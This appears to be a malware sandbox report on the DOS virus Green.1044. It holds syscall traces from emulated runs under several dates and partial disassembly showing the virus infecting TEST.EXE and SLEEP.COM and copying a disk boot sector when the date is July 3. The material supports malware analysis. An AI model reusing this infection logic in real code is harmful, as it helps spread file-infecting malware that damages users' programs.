Sample viewer

vx.netlux.org/Virus.DOS.Green.1044

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:50:38.559443441Z 26 PC: 12ab7 | Set disk transfer address
2018-12-17T21:50:38.561662724Z 71 PC: 12ac1 | Get current directory
2018-12-17T21:50:38.564378312Z 53 PC: 12ac6 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:50:38.565459595Z 37 PC: 12ada | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:50:38.566677611Z 42 PC: 12ae0 | Get date 0x12ae0: cmp dh, 7
0x12ae3: je 0x12ae8
0x12ae5: jmp 0x12b8b
0x12ae8: cmp dl, 3
0x12aeb: je 0x12af0
0x12aed: jmp 0x12b8b
0x12af0: mov ax, 0x201
0x12af3: mov cx, 1
0x12af6: xor dx, dx
0x12af8: lea bx, word ptr [bp + 0x4fc]
0x12afc: int 0x13
0x12afe: mov ah, 0x3c
0x12b00: xor cx, cx
0x12b02: lea dx, word ptr [bp + 0x209]
0x12b06: int 0x21
0x12b08: jb 0x12b28
0x12b0a: xchg ax, bx
0x12b0b: mov ah, 0x40
0x12b0d: mov cx, 0x200
0x12b10: lea dx, word ptr [bp + 0x4fc]
2018-12-17T21:50:38.569052133Z 78 PC: 12bc6 | Find first file
2018-12-17T21:50:38.57464322Z 67 PC: 12cf8 | Get or set file attributes
2018-12-17T21:50:38.581202619Z 67 PC: 12d17 | Get or set file attributes
2018-12-17T21:50:38.595658536Z 61 PC: 12d27 | Open file (Filename = 'TEST.EXE')
2018-12-17T21:50:38.601906023Z 63 PC: 12d44 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T21:50:38.607983729Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.610312582Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.611507315Z 64 PC: 12deb | Write file or device (Write 26 bytes on handle 5)
2018-12-17T21:50:38.613883711Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.616010289Z 44 PC: 12dfe | Get time 0x12dfe: mov byte ptr [bp + 0x415], dl
0x12e02: call 0x12e27
0x12e05: call 0x12e40
0x12e08: mov cx, 0x414
0x12e0b: mov ah, 0x40
0x12e0d: lea dx, word ptr [bp + 4]
0x12e11: int 0x21
0x12e13: call 0x12e40
0x12e16: call 0x12e27
0x12e19: pop ax
0x12e1a: mov byte ptr [bp + 0x215], al
0x12e1e: call 0x22b9d
0x12e21: call 0x22bab
0x12e24: jmp 0x12bdf
0x12e27: cld
0x12e28: mov ax, cs
0x12e2a: mov es, ax
0x12e2c: mov ah, byte ptr [bp + 0x415]
0x12e30: mov cx, 0x390
0x12e33: lea si, word ptr [bp + 0x32]
2018-12-17T21:50:38.618333914Z 64 PC: 12e13 | Write file or device (Write 1044 bytes on handle 5)
2018-12-17T21:50:38.627997117Z 87 PC: 12baa | Get or set file date and time
2018-12-17T21:50:38.629818265Z 62 PC: 12baf | Close file
2018-12-17T21:50:38.640924694Z 67 PC: 12bbc | Get or set file attributes
2018-12-17T21:50:38.650060422Z 59 PC: 12be7 | Change current directory
2018-12-17T21:50:38.654845508Z 78 PC: 12bc6 | Find first file
2018-12-17T21:50:38.66106741Z 67 PC: 12cf8 | Get or set file attributes
2018-12-17T21:50:38.666464956Z 67 PC: 12d17 | Get or set file attributes
2018-12-17T21:50:38.676829811Z 61 PC: 12d27 | Open file (Filename = 'SLEEP.COM')
2018-12-17T21:50:38.683231324Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.684511414Z 66 PC: 12c80 | Move file pointer
2018-12-17T21:50:38.68683475Z 63 PC: 12c8b | Read file or device (Read 1 bytes on handle 5)
2018-12-17T21:50:38.69307017Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.694239252Z 63 PC: 12cae | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:50:38.697201974Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.698465119Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.699720346Z 64 PC: 12cd7 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:50:38.702818285Z 66 PC: 12c65 | Move file pointer
2018-12-17T21:50:38.704538357Z 44 PC: 12dfe | Get time 0x12dfe: mov byte ptr [bp + 0x415], dl
0x12e02: call 0x12e27
0x12e05: call 0x12e40
0x12e08: mov cx, 0x414
0x12e0b: mov ah, 0x40
0x12e0d: lea dx, word ptr [bp + 4]
0x12e11: int 0x21
0x12e13: call 0x12e40
0x12e16: call 0x12e27
0x12e19: pop ax
0x12e1a: mov byte ptr [bp + 0x215], al
0x12e1e: call 0x22b9d
0x12e21: call 0x22bab
0x12e24: jmp 0x12bdf
0x12e27: cld
0x12e28: mov ax, cs
0x12e2a: mov es, ax
0x12e2c: mov ah, byte ptr [bp + 0x415]
0x12e30: mov cx, 0x390
0x12e33: lea si, word ptr [bp + 0x32]
2018-12-17T21:50:38.707251037Z 64 PC: 12e13 | Write file or device (Write 1044 bytes on handle 5)
2018-12-17T21:50:38.715206152Z 87 PC: 12baa | Get or set file date and time
2018-12-17T21:50:38.71651002Z 62 PC: 12baf | Close file
2018-12-17T21:50:38.721308107Z 67 PC: 12bbc | Get or set file attributes
2018-12-17T21:50:38.727617225Z 59 PC: 12be7 | Change current directory
2018-12-17T21:50:38.731515077Z 37 PC: 12bfb | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:50:38.732416744Z 26 PC: 12c17 | Set disk transfer address
2018-12-17T21:50:38.733368526Z 76 PC: 12a44 | Terminate with return code (Return code = '164')

{"DateBased":true,"Day":3,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":27,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:39:45.259087143Z 26 PC: 12ab7 | Set disk transfer address
2018-12-25T11:39:45.260921371Z 71 PC: 12ac1 | Get current directory
2018-12-25T11:39:45.264035237Z 53 PC: 12ac6 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:45.265240351Z 37 PC: 12ada | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:45.266957788Z 42 PC: 12ae0 | Get date 0x12ae0: cmp dh, 7
0x12ae3: je 0x12ae8
0x12ae5: jmp 0x12b8b
0x12ae8: cmp dl, 3
0x12aeb: je 0x12af0
0x12aed: jmp 0x12b8b
0x12af0: mov ax, 0x201
0x12af3: mov cx, 1
0x12af6: xor dx, dx
0x12af8: lea bx, word ptr [bp + 0x4fc]
0x12afc: int 0x13
0x12afe: mov ah, 0x3c
0x12b00: xor cx, cx
0x12b02: lea dx, word ptr [bp + 0x209]
0x12b06: int 0x21
0x12b08: jb 0x12b28
0x12b0a: xchg ax, bx
0x12b0b: mov ah, 0x40
0x12b0d: mov cx, 0x200
0x12b10: lea dx, word ptr [bp + 0x4fc]
2018-12-25T11:39:45.271507281Z 60 PC: 12b08 | Create or truncate file
2018-12-25T11:39:46.194887355Z 64 PC: 12b16 | Write file or device (Write 512 bytes on handle 5)
2018-12-25T11:39:46.275503856Z 62 PC: 12b1a | Close file
2018-12-25T11:39:48.670249201Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:39:48.671616422Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:39:48.674197493Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:39:48.677531381Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:39:48.689707071Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:39:48.691593402Z 62 PC: 91fc1 | Close file
2018-12-25T11:39:48.694782577Z 75 PC: 91fe0 | Execute program
2018-12-25T11:39:48.712669061Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:39:48.714058318Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T11:39:48.720061802Z 48 PC: c609 | Get DOS version
2018-12-25T11:39:48.723705241Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:39:48.726694372Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:39:48.730447834Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:39:48.734649826Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T11:39:48.738913364Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T11:39:48.744557961Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:39:48.75911Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:39:48.760853856Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:39:48.763473241Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:39:48.789389612Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:39:48.794149116Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T11:39:48.79564467Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:39:48.798066767Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:39:48.800413784Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:39:48.802046132Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:39:48.804672139Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:39:48.813653693Z 62 PC: 8f8eb | Close file
2018-12-25T11:39:48.815659426Z 62 PC: 8f8f2 | Close file
2018-12-25T11:39:48.818344998Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.820002815Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.821499605Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.822941806Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.824829199Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.826518721Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.828197165Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.830351706Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.831897534Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.833535816Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.844076699Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.845846819Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.847466468Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.849905756Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.851676261Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.853590153Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.856677278Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.85863275Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.860553943Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.862623904Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.864767017Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.866632947Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.868522642Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.870860462Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.872756792Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.874620788Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.876795533Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.878389919Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.879949275Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:39:48.8819567Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:39:48.887496728Z 62 PC: 8f90e | Close file
2018-12-25T11:39:48.890633156Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:39:48.893032401Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:39:48.894827043Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:39:48.899845067Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:39:48.902262119Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:39:48.907856128Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:39:48.910127894Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:39:48.912484546Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:39:48.913752614Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:39:48.914877321Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:39:48.919180845Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:39:48.921922858Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:39:48.923502897Z 73 PC: 8fa11 | Release memory
2018-12-25T11:39:48.925391682Z 73 PC: 8efea | Release memory
2018-12-25T11:39:48.928650493Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:39:48.930712766Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:39:48.935446422Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:39:48.937290435Z 73 PC: 8f060 | Release memory
2018-12-25T11:39:48.938659638Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T11:39:48.949174537Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:39:48.955926998Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:39:48.957922425Z 62 PC: 8f0d1 | Close file
2018-12-25T11:39:48.960478369Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:39:48.985448707Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:39:48.986364612Z 48 PC: 12bee | Get DOS version
2018-12-25T11:39:48.987951312Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:39:48.990603511Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:39:48.991949222Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:39:48.993269757Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:39:48.996058216Z 72 PC: 1355d | Allocate memory
2018-12-25T11:39:48.997752807Z 25 PC: 13596 | Get default drive
2018-12-25T11:39:48.99890613Z 71 PC: 135ad | Get current directory
2018-12-25T11:39:49.002419416Z 59 PC: 135ba | Change current directory
2018-12-25T11:39:49.00849461Z 59 PC: 135c8 | Change current directory
2018-12-25T11:39:49.015043159Z 59 PC: 135d3 | Change current directory
2018-12-25T11:39:49.019535537Z 25 PC: 12d13 | Get default drive
2018-12-25T11:39:49.020935821Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:39:49.02221159Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:39:49.024536544Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:49.026981601Z 80 PC: 1301d | Set current PSP
2018-12-25T11:39:49.027983181Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T11:39:49.030608395Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:39:49.031965212Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T11:39:49.033293029Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:39:49.035525807Z 72 PC: 130ec | Allocate memory
2018-12-25T11:39:49.037612162Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:39:49.045140589Z 62 PC: 131ba | Close file
2018-12-25T11:39:49.047569752Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:39:49.057085356Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:39:49.058834158Z 72 PC: 11991 | Allocate memory
2018-12-25T11:39:49.060895269Z 73 PC: 119b2 | Release memory
2018-12-25T11:39:49.062754204Z 72 PC: 119bd | Allocate memory
2018-12-25T11:39:49.064502116Z 73 PC: 119df | Release memory
2018-12-25T11:39:49.066075247Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:39:49.06875756Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":27,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:39:45.438840372Z 26 PC: 12ab7 | Set disk transfer address
2018-12-25T11:39:45.440427839Z 71 PC: 12ac1 | Get current directory
2018-12-25T11:39:45.443768721Z 53 PC: 12ac6 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:45.445330451Z 37 PC: 12ada | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:45.447228742Z 42 PC: 12ae0 | Get date 0x12ae0: cmp dh, 7
0x12ae3: je 0x12ae8
0x12ae5: jmp 0x12b8b
0x12ae8: cmp dl, 3
0x12aeb: je 0x12af0
0x12aed: jmp 0x12b8b
0x12af0: mov ax, 0x201
0x12af3: mov cx, 1
0x12af6: xor dx, dx
0x12af8: lea bx, word ptr [bp + 0x4fc]
0x12afc: int 0x13
0x12afe: mov ah, 0x3c
0x12b00: xor cx, cx
0x12b02: lea dx, word ptr [bp + 0x209]
0x12b06: int 0x21
0x12b08: jb 0x12b28
0x12b0a: xchg ax, bx
0x12b0b: mov ah, 0x40
0x12b0d: mov cx, 0x200
0x12b10: lea dx, word ptr [bp + 0x4fc]
2018-12-25T11:39:45.461663402Z 78 PC: 12bc6 | Find first file
2018-12-25T11:39:45.468440894Z 67 PC: 12cf8 | Get or set file attributes
2018-12-25T11:39:45.474689498Z 67 PC: 12d17 | Get or set file attributes
2018-12-25T11:39:46.194701712Z 61 PC: 12d27 | Open file (Filename = 'TEST.EXE')
2018-12-25T11:39:46.207717805Z 63 PC: 12d44 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:39:46.214924186Z 66 PC: 12c65 | Move file pointer
2018-12-25T11:39:46.217922889Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.220648854Z 64 PC: 12deb | Write file or device (Write 26 bytes on handle 5)
2018-12-25T11:39:46.22398681Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.226468614Z 44 PC: 12dfe | Get time 0x12dfe: mov byte ptr [bp + 0x415], dl
0x12e02: call 0x12e27
0x12e05: call 0x12e40
0x12e08: mov cx, 0x414
0x12e0b: mov ah, 0x40
0x12e0d: lea dx, word ptr [bp + 4]
0x12e11: int 0x21
0x12e13: call 0x12e40
0x12e16: call 0x12e27
0x12e19: pop ax
0x12e1a: mov byte ptr [bp + 0x215], al
0x12e1e: call 0x22b9d
0x12e21: call 0x22bab
0x12e24: jmp 0x12bdf
0x12e27: cld
0x12e28: mov ax, cs
0x12e2a: mov es, ax
0x12e2c: mov ah, byte ptr [bp + 0x415]
0x12e30: mov cx, 0x390
0x12e33: lea si, word ptr [bp + 0x32]
2018-12-25T11:39:46.229444019Z 64 PC: 12e13 | Write file or device (Write 1044 bytes on handle 5)
2018-12-25T11:39:46.275311537Z 87 PC: 12baa | Get or set file date and time
2018-12-25T11:39:46.282091247Z 62 PC: 12baf | Close file
2018-12-25T11:39:46.319728319Z 67 PC: 12bbc | Get or set file attributes
2018-12-25T11:39:46.422984271Z 59 PC: 12be7 | Change current directory
2018-12-25T11:39:46.427831476Z 78 PC: 12bc6 | Find first file (See above)
2018-12-25T11:39:46.434879972Z 67 PC: 12cf8 | Get or set file attributes (See above)
2018-12-25T11:39:46.446314316Z 67 PC: 12d17 | Get or set file attributes (See above)
2018-12-25T11:39:46.480618603Z 61 PC: 12d27 | Open file (See above)
2018-12-25T11:39:46.488968412Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.490753204Z 66 PC: 12c80 | Move file pointer
2018-12-25T11:39:46.492414821Z 63 PC: 12c8b | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:39:46.502228937Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.504364382Z 63 PC: 12cae | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:39:46.507894893Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.511178135Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.512849854Z 64 PC: 12cd7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:39:46.516015483Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.518622813Z 44 PC: 12dfe | Get time (See above)
2018-12-25T11:39:46.521638928Z 64 PC: 12e13 | Write file or device (See above)
2018-12-25T11:39:46.551569725Z 87 PC: 12baa | Get or set file date and time (See above)
2018-12-25T11:39:46.553970648Z 62 PC: 12baf | Close file (See above)
2018-12-25T11:39:46.588835793Z 67 PC: 12bbc | Get or set file attributes (See above)
2018-12-25T11:39:46.627489995Z 59 PC: 12be7 | Change current directory (See above)
2018-12-25T11:39:46.631962605Z 37 PC: 12bfb | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:46.634144974Z 26 PC: 12c17 | Set disk transfer address
2018-12-25T11:39:46.635847733Z 76 PC: 12a44 | Terminate with return code (Return code = '164')

{"DateBased":true,"Day":1,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":27,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:39:45.640532833Z 26 PC: 12ab7 | Set disk transfer address
2018-12-25T11:39:45.641645605Z 71 PC: 12ac1 | Get current directory
2018-12-25T11:39:45.644051809Z 53 PC: 12ac6 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:45.645262748Z 37 PC: 12ada | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:45.646334972Z 42 PC: 12ae0 | Get date 0x12ae0: cmp dh, 7
0x12ae3: je 0x12ae8
0x12ae5: jmp 0x12b8b
0x12ae8: cmp dl, 3
0x12aeb: je 0x12af0
0x12aed: jmp 0x12b8b
0x12af0: mov ax, 0x201
0x12af3: mov cx, 1
0x12af6: xor dx, dx
0x12af8: lea bx, word ptr [bp + 0x4fc]
0x12afc: int 0x13
0x12afe: mov ah, 0x3c
0x12b00: xor cx, cx
0x12b02: lea dx, word ptr [bp + 0x209]
0x12b06: int 0x21
0x12b08: jb 0x12b28
0x12b0a: xchg ax, bx
0x12b0b: mov ah, 0x40
0x12b0d: mov cx, 0x200
0x12b10: lea dx, word ptr [bp + 0x4fc]
2018-12-25T11:39:45.64829849Z 78 PC: 12bc6 | Find first file
2018-12-25T11:39:45.65224208Z 67 PC: 12cf8 | Get or set file attributes
2018-12-25T11:39:45.658458758Z 67 PC: 12d17 | Get or set file attributes
2018-12-25T11:39:46.195883327Z 61 PC: 12d27 | Open file (Filename = 'TEST.EXE')
2018-12-25T11:39:46.204224889Z 63 PC: 12d44 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:39:46.207575778Z 66 PC: 12c65 | Move file pointer
2018-12-25T11:39:46.212607329Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.214073648Z 64 PC: 12deb | Write file or device (Write 26 bytes on handle 5)
2018-12-25T11:39:46.216877378Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.218242448Z 44 PC: 12dfe | Get time 0x12dfe: mov byte ptr [bp + 0x415], dl
0x12e02: call 0x12e27
0x12e05: call 0x12e40
0x12e08: mov cx, 0x414
0x12e0b: mov ah, 0x40
0x12e0d: lea dx, word ptr [bp + 4]
0x12e11: int 0x21
0x12e13: call 0x12e40
0x12e16: call 0x12e27
0x12e19: pop ax
0x12e1a: mov byte ptr [bp + 0x215], al
0x12e1e: call 0x22b9d
0x12e21: call 0x22bab
0x12e24: jmp 0x12bdf
0x12e27: cld
0x12e28: mov ax, cs
0x12e2a: mov es, ax
0x12e2c: mov ah, byte ptr [bp + 0x415]
0x12e30: mov cx, 0x390
0x12e33: lea si, word ptr [bp + 0x32]
2018-12-25T11:39:46.221432484Z 64 PC: 12e13 | Write file or device (Write 1044 bytes on handle 5)
2018-12-25T11:39:46.275701825Z 87 PC: 12baa | Get or set file date and time
2018-12-25T11:39:46.277518295Z 62 PC: 12baf | Close file
2018-12-25T11:39:46.319163186Z 67 PC: 12bbc | Get or set file attributes
2018-12-25T11:39:46.337687104Z 59 PC: 12be7 | Change current directory
2018-12-25T11:39:46.342106469Z 78 PC: 12bc6 | Find first file (See above)
2018-12-25T11:39:46.349305476Z 67 PC: 12cf8 | Get or set file attributes (See above)
2018-12-25T11:39:46.355607518Z 67 PC: 12d17 | Get or set file attributes (See above)
2018-12-25T11:39:46.376632082Z 61 PC: 12d27 | Open file (See above)
2018-12-25T11:39:46.403744905Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.405295007Z 66 PC: 12c80 | Move file pointer
2018-12-25T11:39:46.406737183Z 63 PC: 12c8b | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:39:46.417508766Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.419309314Z 63 PC: 12cae | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:39:46.422337245Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.427523226Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.429074897Z 64 PC: 12cd7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:39:46.431983811Z 66 PC: 12c65 | Move file pointer (See above)
2018-12-25T11:39:46.433789885Z 44 PC: 12dfe | Get time (See above)
2018-12-25T11:39:46.437683316Z 64 PC: 12e13 | Write file or device (See above)
2018-12-25T11:39:46.465636124Z 87 PC: 12baa | Get or set file date and time (See above)
2018-12-25T11:39:46.467633653Z 62 PC: 12baf | Close file (See above)
2018-12-25T11:39:46.527064135Z 67 PC: 12bbc | Get or set file attributes (See above)
2018-12-25T11:39:46.589021518Z 59 PC: 12be7 | Change current directory (See above)
2018-12-25T11:39:46.59512583Z 37 PC: 12bfb | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:39:46.616578726Z 26 PC: 12c17 | Set disk transfer address
2018-12-25T11:39:46.618328951Z 76 PC: 12a44 | Terminate with return code (Return code = '164')